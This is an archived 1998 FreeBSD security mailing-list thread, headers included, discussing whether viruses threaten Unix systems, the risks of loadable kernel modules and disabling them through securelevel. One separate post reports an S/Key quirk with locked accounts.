majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 20 12:22:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA04457 for freebsd-security-outgoing; Wed, 20 May 1998 12:22:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from bofh.shmooze.net (markjr@bofh.shmOOze.net [205.210.42.6]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA04331 for ; Wed, 20 May 1998 12:21:46 -0700 (PDT) (envelope-from markjr@bofh.shmooze.net) Received: (from markjr@localhost) by bofh.shmooze.net (8.8.5/8.8.3) id PAA06101; Wed, 20 May 1998 15:21:35 -0400 Message-ID: X-Mailer: XFMail 1.3-beta-042198 [p0] on Linux X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <3562A6DB.3412BC8B@elr346.ateng.az.honeywell.com> Date: Wed, 20 May 1998 15:21:35 -0400 (EDT) Reply-To: Stunt Pope Organization: Private World Communications From: Stunt Pope To: Emmanuel Gravel Subject: RE: Virus on FreeBSD Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On 20-May-98 Emmanuel Gravel wrote: > I haven't heard of a virus made for a Unix-like OS before, but I'm > wondering if this can be an issue with FreeBSD (or Linux for that > matter). I'm saying this since they both run on the most common > platform there is today, the PC. I know most virii were writen for > DOS-like OS's, but it's my impression that the common point between > both machines is the hardware. > > Can anyone either clear this for me, or point me in the right direction > for some info? > Checkout the Bugtraq archives, and search on "linux virus", there was one released last summer or so, mainly as an exercise IIRC. Can't remember the name of it though. (http://www.geek-girl.com/bugtraq/) -mark --- Mark Jeftovic aka: mark jeff or vic, stunt pope. markjr@shmOOze.net http://www.shmOOze.net/~markjr Private World's BOFH http://www.PrivateWorld.com irc: L-bOMb Keep `em Guessing To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 20 13:18:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA16915 for freebsd-security-outgoing; Wed, 20 May 1998 13:18:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ELR17.ateng.az.honeywell.com (elr17.ateng.az.Honeywell.COM [129.239.169.43]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id NAA16807 for ; Wed, 20 May 1998 13:17:46 -0700 (PDT) (envelope-from egravel@elr346.ateng.az.honeywell.com) Received: from elr346.ateng.az.honeywell.com by elr346.ateng.az.honeywell.com with SMTP; Wed, 20 May 1998 13:17:14 -0700 Message-ID: <3562D7D7.65F60C0@elr346.ateng.az.honeywell.com> Date: Wed, 20 May 1998 13:17:11 -0700 From: Emmanuel Gravel Organization: Honeywell X-Mailer: Mozilla 3.03Gold (X11; I; OpenVMS V6.1 VAXstation 4000-90) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Stunt Pope wrote: > On 20-May-98 Emmanuel Gravel wrote: > > I haven't heard of a virus made for a Unix-like OS before, but I'm > > wondering if this can be an issue with FreeBSD (or Linux for that > > matter). I'm saying this since they both run on the most common > > platform there is today, the PC. I know most virii were writen for > > DOS-like OS's, but it's my impression that the common point between > > both machines is the hardware. > > > > Can anyone either clear this for me, or point me in the right direction > > for some info? > > > > Checkout the Bugtraq archives, and search on "linux virus", there was > one released last summer or so, mainly as an exercise IIRC. Can't > remember the name of it though. > > (http://www.geek-girl.com/bugtraq/) > > -mark Thanks for all the info. Now for a second question. Since there is an antivirus made by McAfee for Linux, Solaris, HP-UX, AIX (and one or two more Unix OS's) is there anything similar made for FreeBSD? What can one download/purchase to prevent: 1- Arrival/infection of the system from any virus that would target FreeBSD? 2- Presence of virii for any other OS in any file on the system? Thanks for your help! Emmanuel Gravel egravel@elr346.ateng.az.honeywell.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 20 15:26:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA11776 for freebsd-security-outgoing; Wed, 20 May 1998 15:26:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from coleridge.kublai.com (coleridge.kublai.com [207.96.1.116]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA11704 for ; Wed, 20 May 1998 15:25:51 -0700 (PDT) (envelope-from shmit@natasya.kublai.com) Received: from natasya.kublai.com (natasya.kublai.com [207.172.25.236]) by coleridge.kublai.com (8.8.8/8.8.8) with ESMTP id SAA03153; Wed, 20 May 1998 18:25:33 -0400 (EDT) (envelope-from shmit@natasya.kublai.com) Received: (from shmit@localhost) by natasya.kublai.com (8.8.8/8.8.8) id SAA19246; Wed, 20 May 1998 18:25:32 -0400 (EDT) Message-ID: <19980520182532.04857@kublai.com> Date: Wed, 20 May 1998 18:25:32 -0400 From: Brian Cully To: Emmanuel Gravel , freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD Reply-To: shmit@kublai.com Mail-Followup-To: Emmanuel Gravel , freebsd-security@FreeBSD.ORG References: <3562D7D7.65F60C0@elr346.ateng.az.honeywell.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.89i In-Reply-To: <3562D7D7.65F60C0@elr346.ateng.az.honeywell.com>; from Emmanuel Gravel on Wed, May 20, 1998 at 01:17:11PM -0700 X-Sender: If your mailer pays attention to this, it's broken. X-PGP-Info: finger shmit@kublai.com for my public key. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Wed, May 20, 1998 at 01:17:11PM -0700, Emmanuel Gravel wrote: > Thanks for all the info. Now for a second question. Since there is an > antivirus made by McAfee for Linux, Solaris, HP-UX, AIX (and one or two > more Unix OS's) is there anything similar made for FreeBSD? What can > one download/purchase to prevent: > > 1- Arrival/infection of the system from any virus that would target > FreeBSD? Don't run anything as root and it has a fairly limited chance of spreading to anything. :-) > 2- Presence of virii for any other OS in any file on the system? Use McAfee's tools for various other Operating Systems. -- Brian Cully ``And when one of our comrades was taken prisoner, blindfolded, hung upside-down, shot, and burned, we thought to ourselves, `These are the best experiences of our lives''' -Pathology (Joe Frank, Somewhere Out There) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 20 17:19:24 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id RAA01655 for freebsd-security-outgoing; Wed, 20 May 1998 17:19:24 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id RAA01618 for ; Wed, 20 May 1998 17:19:04 -0700 (PDT) (envelope-from cschuber@passer.osg.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id RAA04596; Wed, 20 May 1998 17:18:59 -0700 (PDT) Message-Id: <199805210018.RAA04596@passer.osg.gov.bc.ca> Received: from localhost(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost, id smtpdaaepaa; Wed May 20 17:18:58 1998 X-Mailer: exmh version 2.0gamma 1/27/96 Reply-to: Cy Schubert - ITSD Open Systems Group X-Sender: cschuber To: Emmanuel Gravel cc: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-reply-to: Your message of "Wed, 20 May 1998 13:17:11 PDT." <3562D7D7.65F60C0@elr346.ateng.az.honeywell.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 20 May 1998 17:18:37 -0700 From: Cy Schubert - ITSD Open Systems Group Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > Stunt Pope wrote: > > On 20-May-98 Emmanuel Gravel wrote: > > > I haven't heard of a virus made for a Unix-like OS before, but I'm > > > wondering if this can be an issue with FreeBSD (or Linux for that > > > matter). I'm saying this since they both run on the most common > > > platform there is today, the PC. I know most virii were writen for > > > DOS-like OS's, but it's my impression that the common point between > > > both machines is the hardware. > > > > > > Can anyone either clear this for me, or point me in the right direction > > > for some info? > > > > > > > Checkout the Bugtraq archives, and search on "linux virus", there was > > one released last summer or so, mainly as an exercise IIRC. Can't > > remember the name of it though. > > > > (http://www.geek-girl.com/bugtraq/) > > > > -mark > > Thanks for all the info. Now for a second question. Since there is an > antivirus made by McAfee for Linux, Solaris, HP-UX, AIX (and one or two > more Unix OS's) is there anything similar made for FreeBSD? What can > one download/purchase to prevent: > > 1- Arrival/infection of the system from any virus that would target > FreeBSD? > 2- Presence of virii for any other OS in any file on the system? > > Thanks for your help! Sorry for getting into this late... another day of meetings. The Linux virus was not a virus in the truest sense. What it did was to move the original binary to some other directory and replace it with itself, which in turn would do what virus-like programs like to do and finally exec(2) the original program. If you want to characterize this in any way, it would probably be closer to a trojan horse than a virus, though that's more an issue of semantics. The best way to detect such a beast on a UNIX system would probably be with tripwire or some other application that maintains signatures of various files on your system. > > Emmanuel Gravel > egravel@elr346.ateng.az.honeywell.com Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 20 18:51:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA17677 for freebsd-security-outgoing; Wed, 20 May 1998 18:51:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from goliath.camtech.net.au (goliath.camtech.net.au [203.5.73.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA17551 for ; Wed, 20 May 1998 18:50:21 -0700 (PDT) (envelope-from newton@camtech.com.au) Received: from sebastion.sa.camtech.com.au (sebastion.sa.camtech.com.au [203.28.3.2]) by goliath.camtech.net.au (8.8.5/8.8.2) with ESMTP id LAA05083; Thu, 21 May 1998 11:16:47 +0930 (CST) Received: (from smtp@localhost) by sebastion.sa.camtech.com.au (8.8.5/8.8.7) id LAA02391; Thu, 21 May 1998 11:19:44 +0930 (CST) Received: from slingshot(192.168.1.2) by sebastion via smap (V2.0) id xma002389; Thu, 21 May 98 11:19:32 +0930 Received: from frenzy.ct (newton@frenzy.ct [192.168.4.65]) by slingshot.camtech.com.au (8.6.12/8.6.12) with ESMTP id LAA11667; Thu, 21 May 1998 11:17:07 +0930 From: Mark Newton Received: (from newton@localhost) by frenzy.ct (8.8.8/8.8.8) id LAA25157; Thu, 21 May 1998 11:19:29 +0930 (CST) Message-Id: <199805210149.LAA25157@frenzy.ct> Subject: Re: Virus on FreeBSD In-Reply-To: <199805210018.RAA04596@passer.osg.gov.bc.ca> from Cy Schubert - ITSD Open Systems Group at "May 20, 98 05:18:37 pm" To: cschuber@uumail.gov.bc.ca Date: Thu, 21 May 1998 11:19:29 +0930 (CST) Cc: egravel@elr346.ateng.az.honeywell.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Cy Schubert - ITSD Open Systems Group wrote: > Stunt Pope wrote: > > Thanks for all the info. Now for a second question. Since there is an > > antivirus made by McAfee for Linux, Solaris, HP-UX, AIX (and one or two > > more Unix OS's) is there anything similar made for FreeBSD? What can > > one download/purchase to prevent: > > > > 1- Arrival/infection of the system from any virus that would target > > FreeBSD? > > 2- Presence of virii for any other OS in any file on the system? In addition to Cy's comments about the Linux "virus", I'd also point out that TTBOMK McAfee's virus scanners for Unix don't search for Unix viruses; They search for Wintel and Mac viruses enclosed within email attachments on Unix mail servers. As such they fit category 2 above. Category 1 is so far off the radar that it isn't worth considering -- IF one shows a little bit of discipline with the use of one's hash prompt (i.e.: don't go running foreign binaries as root unless you trust 'em). Since most people seem to show that required discipline, I'd guess that the law of diminishing returns makes it unworthwhile to actually write Unix viruses in the first place. LKMs open vast new vistas of potential for viruses, btw. I attended a series of seminars given my Kirk some number of years ago, where he said the decision to avoid expending development time on LKMs for 4.4BSD was partly motivated by the security concerns raised by the ability to move executable code from user-space (i.e.: the filesystem) into the kernel. Mitnick's SunOS "tap" streams module is but one example :-) - mark --- Mark Newton Email: newton@communica.com.au Systems Engineer and Senior Trainer Phone: +61-8-8303-3300 Communica Systems, a member of the Fax: +61-8-8303-4403 CAMTECH group of companies WWW: http://www.communica.com.au To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 07:31:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA15728 for freebsd-security-outgoing; Thu, 21 May 1998 07:31:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA15710 for ; Thu, 21 May 1998 07:31:24 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id KAA29470 for ; Thu, 21 May 1998 10:31:07 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id KAA02527 for ; Thu, 21 May 1998 10:31:09 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id KAA17444; Thu, 21 May 1998 10:31:08 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Thu, 21 May 1998 10:31:08 -0400 (EDT) Message-Id: <199805211431.KAA17444@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: Mark Newton's message of "Thu, May 21, 1998 11:19:29 +0930" regarding "Re: Virus on FreeBSD" id <199805210149.LAA25157@frenzy.ct> References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ On Thu, May 21, 1998 at 11:19:29 (+0930), Mark Newton wrote: ] > Subject: Re: Virus on FreeBSD > > LKMs open vast new vistas of potential for viruses, btw. I attended a > series of seminars given my Kirk some number of years ago, where he > said the decision to avoid expending development time on LKMs for 4.4BSD > was partly motivated by the security concerns raised by the ability to > move executable code from user-space (i.e.: the filesystem) into the > kernel. Mitnick's SunOS "tap" streams module is but one example :-) A "published" LKM that can do the most nasty things was in the Phrack newsletter issue #51. Anyone who's read that article and has even the tiniest amount of imagination would *NEVER* run LKMs on a production machine. Sure they're a great tool for doing OS developement and experimention at the lowest levels, but they're more dangerous in a production environment than not even having a root password in the first place (at least with the latter you *know* your security is blown). (And that's just one reason never to run SunOS-5 in production! ;-) I'd love to have a "virus" scanner that could detect the signature of a LKM module or the LKM loader in a kernel. Of course by "signature" here I mean something that would recognize the style of code necessary to perform this operation, not the specific sequence of bits in any given implementation. -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 08:17:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA22167 for freebsd-security-outgoing; Thu, 21 May 1998 08:17:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from unix1.it-datacntr.louisville.edu (unix1.it-datacntr.louisville.edu [136.165.4.27]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA22155 for ; Thu, 21 May 1998 08:16:58 -0700 (PDT) (envelope-from k.stevenson@louisville.edu) Received: from homer.louisville.edu (ktstev01@homer.it-datacntr.louisville.edu [136.165.1.20]) by unix1.it-datacntr.louisville.edu (8.8.7/8.8.7) with ESMTP id LAA42586 for ; Thu, 21 May 1998 11:16:54 -0400 Received: (from ktstev01@localhost) by homer.louisville.edu (8.8.8/8.8.8) id LAA12188; Thu, 21 May 1998 11:16:53 -0400 (EDT) Message-ID: <19980521111653.A9283@homer.louisville.edu> Date: Thu, 21 May 1998 11:16:53 -0400 From: Keith Stevenson To: freebsd-security@FreeBSD.ORG Subject: LKMs (Was: Virus on FreeBSD) Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1i In-Reply-To: <199805211431.KAA17444@brain.zeus.leitch.com>; from Greg A. Woods on Thu, May 21, 1998 at 10:31:08AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Ok, I'll buy off on the idea that LKMs can be bad from a security standpoint. How does one go about removing that functionality from the system? Thanks, --Keith Stevenson-- -- Keith Stevenson System Programmer - Data Center Services - University of Louisville k.stevenson@louisville.edu PGP key fingerprint = 4B 29 A8 95 A8 82 EA A2 29 CE 68 DE FC EE B6 A0 On Thu, May 21, 1998 at 10:31:08AM -0400, Greg A. Woods wrote: > > A "published" LKM that can do the most nasty things was in the Phrack > newsletter issue #51. > > Anyone who's read that article and has even the tiniest amount of > imagination would *NEVER* run LKMs on a production machine. Sure > they're a great tool for doing OS developement and experimention at the > lowest levels, but they're more dangerous in a production environment > than not even having a root password in the first place (at least with > the latter you *know* your security is blown). > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 09:17:03 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA01856 for freebsd-security-outgoing; Thu, 21 May 1998 09:17:03 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA01846 for ; Thu, 21 May 1998 09:16:58 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id UAA15419 for ; Thu, 21 May 1998 20:17:29 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id SAA21144 for ; Thu, 21 May 1998 18:41:36 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id SAA05380; Thu, 21 May 1998 18:15:56 +0200 (CEST) Message-ID: <19980521181555.59333@deepo.prosa.dk> Date: Thu, 21 May 1998 18:15:55 +0200 From: Philippe Regnauld To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.88e In-Reply-To: <199805211431.KAA17444@brain.zeus.leitch.com>; from Greg A. Woods on Thu, May 21, 1998 at 10:31:08AM -0400 X-Operating-System: FreeBSD 2.2.5-STABLE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Greg A. Woods writes: > Anyone who's read that article and has even the tiniest amount of > imagination would *NEVER* run LKMs on a production machine. Sure BTW, is there a mechanism to disable loading of LKMs ? (of course, removing the modload command is one way) -- I was thinking about something that looked at the securelevel and refused to load/unload a module depending on it. -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- «Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 09:32:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA05044 for freebsd-security-outgoing; Thu, 21 May 1998 09:32:50 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA05033 for ; Thu, 21 May 1998 09:32:43 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id UAA15429 for ; Thu, 21 May 1998 20:33:21 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id SAA21158 for ; Thu, 21 May 1998 18:57:29 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id SAA05477; Thu, 21 May 1998 18:31:48 +0200 (CEST) Message-ID: <19980521183148.07894@deepo.prosa.dk> Date: Thu, 21 May 1998 18:31:48 +0200 From: Philippe Regnauld To: freebsd-security@FreeBSD.ORG Subject: SKey and locked account Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.88e X-Operating-System: FreeBSD 2.2.5-STABLE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk I'm currently experimenting with 2.2.6, FWTK and skey. 1) First thing I noticed is that it's possible for someone to log into the system, even if the account is disabled ('*' in the passwd field), when S/Key is enabled for that user. Surprise to me. 2) Also, I've tried to use the FWTK's authmgr to set Skey user auth. I use the authmgr's command "proto " to set the user's auth type: authmgr-> proto bob skey changed then I initialize the password with the seed: authmgr-> pass bob gw68016 /usr/libexec/ld.so: Undefined symbol "_MD4Init" called from authsrv:/usr/lib/libskey.so.2.0 at 0x2002a218 ^^^^ Am I missing something here ? -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- «Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 09:39:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA06320 for freebsd-security-outgoing; Thu, 21 May 1998 09:39:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ELR17.ateng.az.honeywell.com (elr17.ateng.az.Honeywell.COM [129.239.169.43]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA06302 for ; Thu, 21 May 1998 09:38:55 -0700 (PDT) (envelope-from egravel@elr346.ateng.az.honeywell.com) Received: from elr346.ateng.az.honeywell.com by elr346.ateng.az.honeywell.com with SMTP; Thu, 21 May 1998 9:38:02 -0700 Message-ID: <3563F5F8.2CD24754@elr346.ateng.az.honeywell.com> Date: Thu, 21 May 1998 09:38:00 -0700 From: Emmanuel Gravel Organization: Honeywell X-Mailer: Mozilla 3.03Gold (X11; I; OpenVMS V6.1 VAXstation 4000-90) MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > A "published" LKM that can do the most nasty things was in the Phrack > newsletter issue #51. Thanks for the info. I'm trying to get the info from Phrack #51 on 2600.com but nothing seems to point to LKM's yet. Do you have any info on which article it could be in? If it's in that one at all? cu l8r! Emmanuel Gravel egravel@elr346.ateng.az.honeywell.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 10:08:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA12787 for freebsd-security-outgoing; Thu, 21 May 1998 10:08:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from fledge.watson.org (root@COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA12773 for ; Thu, 21 May 1998 10:08:13 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id NAA29520; Thu, 21 May 1998 13:07:59 -0400 (EDT) Date: Thu, 21 May 1998 13:07:58 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Philippe Regnauld cc: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: <19980521181555.59333@deepo.prosa.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by hub.freebsd.org id KAA12777 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk >From a quick examination of kern/kern_lkm.c, it appears that if the securelevel > 0, changes to LKMs are not allowed (load, unload, etc). On Thu, 21 May 1998, Philippe Regnauld wrote: > Greg A. Woods writes: > > > Anyone who's read that article and has even the tiniest amount of > > imagination would *NEVER* run LKMs on a production machine. Sure > > BTW, is there a mechanism to disable loading of LKMs ? > (of course, removing the modload command is one way) -- I was > thinking about something that looked at the securelevel > and refused to load/unload a module depending on it. > > -- > -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- > «Pluto placed his bad dog at the entrance of Hades to keep the dead > IN and the living OUT! The archetypical corporate firewall?» > - S. Kelly Bootle > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > Robert N Watson ---- Carnegie Mellon University http://www.cmu.edu/ Trusted Information Systems http://www.tis.com/ SafePort Network Services http://www.safeport.com/ robert@fledge.watson.org http://www.watson.org/~robert/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 10:28:16 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA17357 for freebsd-security-outgoing; Thu, 21 May 1998 10:28:16 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA17341 for ; Thu, 21 May 1998 10:28:11 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.8.8/8.8.8) id NAA29451; Thu, 21 May 1998 13:28:05 -0400 (EDT) (envelope-from wollman) Date: Thu, 21 May 1998 13:28:05 -0400 (EDT) From: Garrett Wollman Message-Id: <199805211728.NAA29451@khavrinen.lcs.mit.edu> To: Keith Stevenson Cc: freebsd-security@FreeBSD.ORG Subject: LKMs (Was: Virus on FreeBSD) In-Reply-To: <19980521111653.A9283@homer.louisville.edu> References: <199805210018.RAA04596@passer.osg.gov.bc.ca> <199805210149.LAA25157@frenzy.ct> <199805211431.KAA17444@brain.zeus.leitch.com> <19980521111653.A9283@homer.louisville.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk < said: > Ok, I'll buy off on the idea that LKMs can be bad from a security standpoint. > How does one go about removing that functionality from the system? In the case of FreeBSD, set the security level to 2. The functionality isn't removed -- we don't provide for that -- but it is inaccessible. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu May 21 11:30:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA28349 for freebsd-security-outgoing; Thu, 21 May 1998 11:30:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA28228 for ; Thu, 21 May 1998 11:29:48 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id LAA07981; Thu, 21 May 1998 11:29:37 -0700 (PDT) Message-Id: <199805211829.LAA07981@burka.rdy.com> Subject: Re: LKMs (Was: Virus 